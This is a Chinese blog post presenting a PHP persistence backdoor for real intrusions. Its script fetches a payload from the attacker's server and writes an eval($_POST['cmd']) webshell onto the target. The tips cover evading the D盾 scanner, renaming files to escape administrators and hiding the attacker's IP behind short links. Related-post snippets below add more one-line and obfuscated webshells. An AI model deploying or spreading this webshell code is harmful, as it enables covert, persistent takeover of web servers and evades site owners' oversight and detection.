简单又较隐蔽的PHP后门

最新推荐文章于 2024-07-03 08:52:14 发布
最新推荐文章于 2024-07-03 08:52:14 发布
阅读量2.6k 收藏 8
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vipshanpin/article/details/111027340
版权

简单又较隐蔽的PHP后门


话不多说,直接上代码(backdoor.php) 

<?php
function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
	curl_close($ch);
	fclose($fp);
	ob_flush();
	flush();
}
if(adminer("http://xx.xx.xx.xx/config.txt","shell.php")) {
	echo "success, access shell.php";
} else {
	echo "fail";
}
?>

Tips1:xx.xx.xx.xx是你的VPS服务器,config.txt要放在你的服务器上,并且能访问。config.txt的内容为一句话,如下:

<?php eval(@$_POST['cmd']);?>

接着访问backdoor.php文件即可在目标服务器上生成一句话后门

在这里插入图片描述

Tips2:在实战中记得把文件名修改一下,否则很容易被管理员发现。
这种权限维持的方法相对于直接留下一句话文件要更加稳定,即使管理员将一句话后门文件删除了,只要backdoor.php文件还在,就可以一直生成后门文件。而且D盾还检测不出backdoor.php文件。如果手上没有免杀PHP后门的朋友们,不妨可以退而求其次,尝试一下。
在这里插入图片描述

Tips3:backdoor.php文件中会出现你的VPS服务器IP地址,这在一定程度上会有被反制的风险。那我们可以将URL转换成短链接进行隐匿。
短链接在线转换网址:ReURL - 传送门
在这里插入图片描述

短链接还原网址:https://www.donglishuzhai.net/tools/hy.php

经过测试,ReURL生成的短链接,上面的还原网站也还原不出来。

邮达速递
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
教你识别简单的免查杀PHP后门
01-20
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php  @$_++; // $_ = 1  $__=(“#”^”|”); // $__ = _   $__.=(“.”^”~”); // _P   $__.=(“/”^”`”); // _PO   $__.=(“|”^”/”); // _POS   $__.=(“{“^”/”); // _POST   ${$__}[!$_](
backdoor:后门调试的微型工具
07-13
后门 Backdoor.js 是一个简单而有用的的微型助手。 在某个函数作用域中创建一个后门,然后访问该作用域或其父作用域中可用的对象。 $ npm install backdoor 你可以通过 npm 和 require('backdoor') 安装它,或者在你的节点应用程序或网页中使用它之前将 backdoor.js 源代码粘贴到某处。
深入探索PHP免杀技术及其防护策略
最新发布
weixin_43822401的博客
07-03 422
免杀技术指的是通过各种手段修改或加密Webshell代码,使其不被安全软件识别的技术。这项技术在网络安全攻防演练中具有重要地位。D盾是一款专为IIS设计的主动防御保护软件,提供多种安全防护功能,包括一句话免疫、主动后门拦截等,以增强服务器的安全性。PHP免杀技术是网络安全领域中攻防双方技术较量的一部分。作为防御方,了解免杀技术的原理和实现方法对于加强防护至关重要。同时,通过采取有效的防护策略,可以显著提高Web应用的安全性,抵御免杀Webshell的威胁。
随记(五):一个简单又较隐蔽PHP后门
XXR_Beta的博客
12-05 564
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
网络攻防|Web后门知识详解
weixin_42282189的博客
10-26 5613
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 0x01 Webshell是什么 1.1 Shell(计算机壳.
backdoorphp.webshell.ad后门病毒怎么办?
小戴站长_一个关于互联网知识的博客
03-29 4497
近日在备份数据的时候,杀毒软件火绒突然爆此文件有病毒backdoorphp.webshell.ad后门病毒,病毒信息为当时在想,又没有做什么怎么会有病毒?后来发现,原来是数据库被写入病毒导致的。只能去搜索哪个表被写入病毒。挨个去查找,只不过需要费点时间罢了。 ...
常见的php后门,有趣的PHP后门
weixin_39678089的博客
04-08 570
前言最近我研究了一种不寻常的小技巧,特地撰写这篇文章来与大家分享。这篇文章提供了许多后门代码中使用的exit()基础知识,开箱即用。这篇文章的关注点在于全局变量GET,POST,REQUEST。最常用的函数(PHP 4, PHP 5, PHP 7)shell_exec - Execute command via shell and return the complete output as a s...
php万能后门程序
09-11
PHP后门是指一种特殊设计的PHP脚本,能够使攻击者在目标服务器上获得持久的、隐蔽的访问权限。这些后门通常是隐藏的,不易被安全扫描工具检测到。它们可以伪装成正常的功能模块,或者通过注入到现有的PHP文件中来...
php简单后门文件
10-03
php简单后门文件
php实现批量查询清除一句话后门的代码
10-30
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了
基于PHP的白菜cms双端影视直播APP全开源无授权无后门源码.zip
09-03
它的语法简单,易于学习,并且具有丰富的扩展库,支持数据库连接、模板引擎等功能。在这个项目中,PHP作为主要的后端开发语言,负责处理HTTP请求、数据处理、业务逻辑以及与数据库交互。 2. **CMS系统架构** 白菜...
PHP后门PHP后门的集合。 仅用于教育或测试目的
02-05
PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并在虚拟机中! 某些后门可能是后门的(是的,确实) 。 永远不要将其用于任何恶意目的。 后门遵循以下格式: Backdoorname_SHA1.php后门的名称是已知的。 PHP工具 这包括指向以下工具的链接: 反混淆器(在线和离线) 美化工具(在线和离线) 测试人员(运行代码-在安全的环境中执行此操作!) 直接从访问这些工具的链接。 其他回购 这是一个
WebShell:Webshel​​l &&后门集合
02-05
WebShell的 这是一个Webshel​​l开源项目 类别 ar Ascx 阿什克斯 阿斯玛克斯 天冬氨酸 Aspx C Cfm Cgi Java脚本 Jsp px 执照 MySQL的 Nginx的 其他 p l 自述文件 SSH协议 肥皂 乌德普 微信 狗狗 icmp 罐 节点js 开火 操作系统 pwnginx Python reGeorg-master Ruby 小服务程序 SH 战争 XML文件 xssshell 作者:小乐天
WebShells:Webshel​​l漏洞注入列表
05-12
WebShells Webshel​​l漏洞注入列表。 #History这是PHP脚本后门的列表,允许攻击者破坏网站并获得对数据库和敏感目录的完整访问权,基本上是PHP Backdoor Web应用程序Trojan,它可以完全入侵任何网站并获得完整的数据库。 #仅用于教育目的。
权限维持:常用后门
f_carey的博客
12-18 1268
权限维持:常用后门1 粘滞键后门1.1 粘滞键1.1.1 设置粘滞键后门1.2 配置开启远程桌面连接1.3 详细建议阅读此处文章2 注册表后门2.1 用注册表添加 nc 后门(metepreter)3 计划任务后门3.1 PowerSploit 中计划任务后门4 WMI 型后门4.1 防御 WMI 型后门5 WEB 后门5.1 weevely5.2 webacoo 后门 配合 Windows 提权文章 1 粘滞键后门 1.1 粘滞键 windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键
php云仅用于,PHP-backdoors 一个PHP后门的集合,仅用于学习或测试目的
weixin_31861055的博客
03-13 119
PHP-backdoorsA collection of PHP backdoors. For educational and/or testing purposes only.NotesThe deobfuscated folder does not necessarily contain deobfuscated versions of the backdoors you can find i...
后门查杀1
wrypot的博客
03-15 331
下载下来是这样的,我们先用火绒查杀一下,打开火绒->病毒查杀->自定义查杀选中要查杀的文件夹。点击详情->查看文件路径->打开include.php。密码就是flag,所以搜pass。
PHP后门
qq_39751956的博客
07-08 250
简单后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
php源码扫描后门工具
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门的工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理通常是通过识别常见的后门代码特征,如eval、assert、system等函数的调用,或者是通过检测非常规的文件操作、远程代码执行等可疑行为。一旦发现可能存在后门的代码片段,工具会向开发者报告,以便开发者可以及时对代码进行修复和加固。 PHP源码扫描后门工具对于保障PHP代码的安全性非常重要。因为PHP是一种开放式的脚本语言,用户可以较为灵活地编写各种代码,但同时也容易受到恶意攻击者的攻击。使用这种工具可以帮助开发者及时发现并修复潜在的安全隐患,保障系统的安全性。 当然,虽然PHP源码扫描后门工具可以发挥一定的作用,但它并不是万能的。开发者在使用这种工具的同时,还需要注重编码规范和安全意识的培养,定期对代码进行审查和加固,以建立一个更加健壮和安全的PHP应用系统。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值